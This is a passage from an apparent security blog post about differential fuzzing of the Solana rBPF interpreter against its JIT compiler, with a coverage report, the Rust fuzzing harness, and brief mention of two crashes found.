  786|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  787|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      6|                ebpf::LD_DW_IMM  => {
  796|      6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      6|                    instruction_width = 2;
  798|      6|                    next_pc += 1;
  799|      6|                    reg[dst] = insn.imm as u64;
  800|      6|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     21|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^4
  806|      4|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|      4|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  811|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|     26|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^19
  816|     19|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|      5|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  821|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^1
  828|      1|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     11|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^6
  833|      6|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^6
  838|      6|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     16|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^2
  850|      2|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^2
  860|      2|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|    136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|     18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|     94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|     14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|    226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|     15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|     98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|      0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|      0|                    }
  886|      0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|      0|                    if reg[src] as i32 == 0 {
  890|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|      0|                    }
  892|      0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|      0|                    }
  895|      0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    102|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|     13|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|     46|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|     16|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      4|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|     32|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      2|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|      4|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|     54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|     90|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|     20|                    if reg[src] as u32 == 0 {
  909|      6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|     14|                    }
  911|     14|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|     96|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|     14|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|     59|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|      7|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|     15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|    236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      2|                ebpf::LE         => {
  920|      2|                    reg[dst] = match insn.imm {
  921|      1|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      1|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      2|                ebpf::BE         => {
  930|      2|                    reg[dst] = match insn.imm {
  931|      1|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      1|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|  16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|     26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|    145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|     25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|    480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|     13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|    191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|      5|                    if reg[src] == 0 {
  950|      3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|      2|                    }
  952|      2|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|      0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|      0|                    }
  958|      0|
  959|      0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|      0|                    if reg[src] == 0 {
  963|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      0|                    }
  965|      0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      0|                    }
  968|      0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    115|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|     19|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|     93|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|     19|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|     19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|     48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|      5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|     94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|    141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|     19|                    if reg[src] == 0 {
  982|      4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|     15|                    }
  984|     15|                                    reg[dst] %= reg[src];
  985|       |                },
  986|     98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|     17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|     89|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|     10|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|     14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|   327k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|    116|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^76                                                           ^40
  996|   131k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^11
  997|   163k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^16.4k
  998|   131k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^34
  999|  65.5k|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^8
 1000|  65.5k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^11
 1001|  65.5k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^3
 1002|      6|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^4                                                            ^2
 1003|   131k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1004|  65.5k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^2
 1005|      3|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^2
 1006|      2|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|   196k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^196k                                                         ^3
 1008|   131k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^3
 1009|  65.5k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^6
 1010|     14|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^13
 1011|  65.5k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^12
 1012|  65.5k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1013|   131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^20
 1014|   147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^23
 1015|  65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1016|   131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     17|                    let mut resolved = false;
 1032|     17|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     17|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     17|                    if syscalls {
 1039|      6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      6|                        }
 1062|     11|                    }
 1063|       |
 1064|     17|                    if calls {
 1065|     11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     11|                        }
 1073|      6|                    }
 1074|       |
 1075|     17|                    if !resolved {
 1076|     17|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     11|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     39|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     39|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|  2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|     33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|  2.16M|            }
 1106|       |        }
 1107|       |
 1108|    683|        Err(EbpfError::ExecutionOverrun(
 1109|    683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    683|        ))
 1111|    886|    }

Now we see that jump and call instructions are actually used, and that we execute the content of the interpreter loop significantly more despite having approximately the same amount of successful calls to the interpreter function. From this, we can infer that not only are more programs successfully executed, but also that, of those executed, they tend to have more valid instructions executed overall.

While this isn’t hitting every branch, it’s now hitting significantly more – and with much more interesting values.

The development of this version of the fuzzer took about an hour, so we’re at a total of one hour of development.

JIT and differential fuzzing

Now that we have a fuzzer which can generate lots of inputs that are actually interesting to us, we can develop a fuzzer which can test both JIT and the interpreter against each other. But how do we even test them against each other?

Picking inputs, outputs, and configuration

As the definition of pseudo-oracle says: we need to check if the alternate program (for JIT, the interpreter, and vice versa), when provided with the same “input” provides the same “output”. So what inputs and outputs do we have?

For inputs, there are three notable things we’ll want to vary:

  • The config which determines how the VM should execute (what features and such)
  • The BPF program to be executed, which we’ll generate like we do in “smart”
  • The initial memory of the VMs

Once we’ve developed our inputs, we’ll also need to think of our outputs:

  • The “return state”, the exit code itself or the error state
  • The number of instructions executed (e.g., did the JIT program overrun?)
  • The final memory of the VMs

Then, to execute both JIT and the interpreter, we’ll take the following steps:

  • The same steps as the first fuzzers:
    • Use the rBPF verification pass (called “check”) to make sure that the VM will accept the input program
    • Initialise the memory, the syscalls, and the entrypoint
    • Create the executable data
  • Then prepare to perform the differential testing
    • JIT compile the BPF code (if it fails, fail quietly)
    • Initialise the interpreted VM
    • Initialise the JIT VM
    • Execute both the interpreted and JIT VMs
    • Compare return state, instructions executed, and final memory, and panic if any do not match.

Writing the fuzzer

As before, I’ve split this up into more manageable chunks so you can read them one at a time outside of their context before trying to interpret their final context.

Step 1: Defining our inputs
#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    ... snip ...
    prog: FuzzProgram,
    mem: Vec<u8>,
}
Step 2: Setting up the VM
fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ... snip ...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        // See step 3
    }
});
Step 3: Executing our input and comparing output
fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});
Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![no_main]

use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,
}

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    prog.exit()
        .set_dst(data.exit_dst)
        .set_src(data.exit_src)
        .set_off(data.exit_off)
        .set_imm(data.exit_imm)
        .push();
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Theoretically, an up-to-date version is available in the rBPF repo.

And, with that, we have our fuzzer! This part of the fuzzer took approximately three hours to implement (largely due to finding several issues with the fuzzer and debugging them along the way).

At this point, we were about six hours in. I turned on the fuzzer and waited:

$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1

And the crashes began. Two main bugs appeared:

  1. A panic when there was an error in interpreter, but not JIT, when writing to a particular address (crash in 15 minutes)
  2. A AddressSanitizer crash from a memory leak when an error occurred just after the instruction limit was past by the JIT’d program (crash in two hours)

To read the details of these bugs, continue to Part 2.

Avast Q1/2022 Threat Report

5 May 2022 at 06:04

Cyberwarfare between Ukraine and Russia

Foreword

